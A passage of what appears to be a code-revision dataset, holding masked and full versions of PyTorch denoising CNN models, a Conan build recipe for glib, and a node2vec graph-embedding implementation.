for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-3": "<mask token>\n\n\nclass DnCNN(NNRegressor):\n <mask token>\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n for i in range(D):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D // 2 - 1):\n 
shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D // 2 - 1, D // 2 + 1):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h +\n h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, \n 2), output_size=shape_buff[-j])\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for 
i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-4": "import os\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch.utils.data as td\nimport torchvision as tv\nimport pandas as pd\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nfrom utils import imshow, NNRegressor\n\n\nclass DnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n for i in range(D):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n 
h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D // 2 - 1):\n shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D // 2 - 1, D // 2 + 1):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h +\n h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, \n 2), output_size=shape_buff[-j])\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 
1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-5": "import os\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch.utils.data as td\nimport torchvision as tv\nimport pandas as pd\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nfrom utils import imshow, NNRegressor\n\n\nclass DnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DnCNN, self).__init__()\n self.D = D\n\n # convolution layers\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n # apply He's initialization\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(\n self.conv[i].weight.data, nonlinearity='relu')\n\n # batch normalization\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n # initialize the weights of the Batch normalization layers\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n for i in range(D):\n h = F.relu(self.bn[i](self.conv[i+1](h)))\n y = self.conv[D+1](h) + x\n return y\n\n\nclass UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n\n # convolution layers\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n # apply He's initialization\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(\n 
self.conv[i].weight.data, nonlinearity='relu')\n\n # batch normalization\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n # initialize the weights of the Batch normalization layers\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D//2-1):\n shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i+1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D//2-1, D//2+1):\n h = F.relu(self.bn[i](self.conv[i+1](h)))\n for i in range(D//2+1, D):\n j = i - (D // 2 + 1) + 1\n h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i+1]((h+h_buff[-j])/np.sqrt(2)))),\n idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j])\n y = self.conv[D+1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n\n # compute k(max_pool) and l(max_unpool)\n k = [0]\n k.extend([i for i in range(D//2)])\n k.extend([k[-1] for _ in range(D//2, D+1)])\n l = [0 for _ in range(D//2+1)]\n l.extend([i for i in range(D+1-(D//2+1))])\n l.append(l[-1])\n\n # holes and dilations for convolution layers\n holes = [2**(kl[0]-kl[1])-1 for kl in zip(k, l)]\n dilations = [i+1 for i in holes]\n\n # convolution layers\n self.conv = nn.ModuleList()\n self.conv.append(\n nn.Conv2d(3, C, 3, padding=dilations[0], dilation=dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i+1],\n dilation=dilations[i+1]) for i in range(D)])\n self.conv.append(\n nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation=dilations[-1]))\n # apply He's initialization\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(\n self.conv[i].weight.data, nonlinearity='relu')\n\n # batch normalization\n self.bn = nn.ModuleList()\n 
self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n # initialize the weights of the Batch normalization layers\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n\n for i in range(D//2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i+1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n\n for i in range(D//2 - 1, D//2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i+1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n\n for i in range(D//2 + 1, D):\n j = i - (D//2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i+1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n\n y = self.conv[D+1](h) + x\n return y\n", "step-ids": [ 4, 7, 8, 10, 11 ] }
[ 4, 7, 8, 10, 11 ]
from conans import * class GlibConan(ConanFile): name = "glib" description = "Common C routines used by Gtk+ and other libs" license = "LGPL" settings = {"os": ["Linux"], "arch": ["x86_64", "armv8"]} build_requires = ( "generators/1.0.0", "autotools/1.0.0", ) requires = ( "glibc/[>=2.31]", "sh/[>=]", ) def source(self): tools.get(f"ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz") def build(self): args = [ "--disable-static", ] autotools = AutoToolsBuildEnvironment(self) autotools.configure(args=args, configure_dir=f"{self.name}-{self.version}") autotools.make() autotools.install()
normal
{ "blob_id": "e49c5c6475a1210a9657d7bbd0490c8d20863718", "index": 2285, "step-1": "<mask token>\n\n\nclass GlibConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-2": "<mask token>\n\n\nclass GlibConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def source(self):\n tools.get(\n f'ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz'\n )\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-3": "<mask token>\n\n\nclass GlibConan(ConanFile):\n name = 'glib'\n description = 'Common C routines used by Gtk+ and other libs'\n license = 'LGPL'\n settings = {'os': ['Linux'], 'arch': ['x86_64', 'armv8']}\n build_requires = 'generators/1.0.0', 'autotools/1.0.0'\n requires = 'glibc/[>=2.31]', 'sh/[>=]'\n\n def source(self):\n tools.get(\n f'ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz'\n )\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-4": "from conans import *\n\n\nclass GlibConan(ConanFile):\n name = 'glib'\n description = 'Common C routines used by Gtk+ and other libs'\n license = 'LGPL'\n settings = {'os': ['Linux'], 'arch': ['x86_64', 'armv8']}\n build_requires = 'generators/1.0.0', 'autotools/1.0.0'\n requires = 'glibc/[>=2.31]', 'sh/[>=]'\n\n def source(self):\n tools.get(\n 
f'ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz'\n )\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-5": "from conans import *\n\nclass GlibConan(ConanFile):\n name = \"glib\"\n description = \"Common C routines used by Gtk+ and other libs\"\n license = \"LGPL\"\n settings = {\"os\": [\"Linux\"], \"arch\": [\"x86_64\", \"armv8\"]}\n build_requires = (\n \"generators/1.0.0\",\n \"autotools/1.0.0\",\n )\n requires = (\n \"glibc/[>=2.31]\",\n \"sh/[>=]\",\n )\n\n def source(self):\n tools.get(f\"ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz\")\n\n def build(self):\n args = [\n \"--disable-static\",\n ]\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=f\"{self.name}-{self.version}\")\n autotools.make()\n autotools.install()\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
<|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = 
self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges <|reserved_special_token_0|> def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in 
unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges <|reserved_special_token_0|> def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G <|reserved_special_token_0|> def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: 
walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges def alias_setup(probs): K = len(probs) q = np.zeros(K) J = np.zeros(K, dtype=np.int) smaller = [] larger = [] for kk, prob in enumerate(probs): q[kk] = K * prob if q[kk] > 1.0: larger.append(kk) else: smaller.append(kk) while len(smaller) > 0 and len(larger) > 0: small = 
smaller.pop() large = larger.pop() J[small] = large q[large] = q[small] + q[large] - 1 if q[large] < 1.0: smaller.append(large) else: larger.append(large) return J, q def alias_draw(J, q): K = len(J) kk = int(np.floor(np.random.rand() * K)) if np.random.rand() < q[kk]: return kk else: return J[kk] def parse_args(): parser = argparse.ArgumentParser(description='Run node2vec.') parser.add_argument('--input', nargs='?', default= './data/Wiki_edgelist.txt', help='Input graph path') parser.add_argument('--output', nargs='?', default= 'emb/node2vec_wiki.emb', help='Embeddings path') parser.add_argument('--label_file', nargs='?', default= 'data/wiki_labels.txt', help='Labels path') parser.add_argument('--dimensions', type=int, default=128, help= 'Number of dimensions. Default is 128.') parser.add_argument('--walk-length', type=int, default=80, help= 'Length of walk per source. Default is 80.') parser.add_argument('--num-walks', type=int, default=20, help= 'Number of walks per source. Default is 10.') parser.add_argument('--window-size', type=int, default=10, help= 'Context size for optimization. Default is 10.') parser.add_argument('--iter', default=2, type=int, help= 'Number of epochs in SGD') parser.add_argument('--workers', type=int, default=8, help= 'Number of parallel workers. Default is 8.') parser.add_argument('--p', type=float, default=1, help= 'Return hyperparameter. Default is 1.') parser.add_argument('--q', type=float, default=1, help= 'Inout hyperparameter. Default is 1.') parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.') parser.add_argument('--unweighted', dest='unweighted', action='store_false' ) parser.set_defaults(weighted=False) parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. 
Default is undirected.') parser.add_argument('--undirected', dest='undirected', action='store_false' ) parser.set_defaults(directed=False) return parser.parse_args() def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G def learning_walks(walks): walks = [list(map(str, walk)) for walk in walks] model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter) model.wv.save_word2vec_format(args.output) return model def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') 
random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = 